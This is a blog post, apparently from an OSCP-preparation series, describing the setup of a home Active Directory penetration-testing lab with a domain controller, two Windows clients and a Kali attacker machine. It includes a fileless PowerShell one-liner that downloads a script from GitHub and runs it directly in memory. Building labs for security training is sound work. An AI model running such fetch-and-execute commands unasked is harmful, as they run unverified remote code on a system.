Active Directory CORPORATIVE.domain.local Series[I] : Environment

 Hi everyone,

So far so good, but right now, we are going to start with a new challenge, that represent the most common architecture that usually the companies implement for corporate domains solutions.

Using the following architecture we are going to implemts and exploit the most comon attacks types in order to compromise a "secure organization" CORPORATIVE.DOMAIN.local:

The previous image is the architecture base for our penetrationtesting personal lab. On the below section you'll find the configurations for every active of our "target company environment":

1. Full platform design up and running on the own local NAT Network, this kind of network, allow the guest servers, connect between theme inside a local subnet (172.0.9.x/24) and have access to internet:

2. Configurations:

In order to obtain the domain members basic configuration, we are going to execute the following powershell script:

    https://github.com/f0ns1/powershell-pentest

Execute on your own operating system fileless (from internet to your local memory), using a powershell terminal:

IEX (new-object Net.webclient).downloadstring('https://raw.githubusercontent.com/f0ns1/powershell-pentest/main/os-recognition.ps1')

2.1 Active directory: Domain controller [Windows Server 2016]

2.2 Client domain 1: [Windows 10]

    

2.3 Client domain 2:  [Windows 10]

2.4 Attacker machine: [Kali linux]

3. Final Network configuration with all machines users and IPS

It's seems that our playground is finish and in this moment, we'll can start to hack!

And this is all for this step of configuration environment, I hope that you enjoy with my first windows entry and you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

with kind regards, f0ns1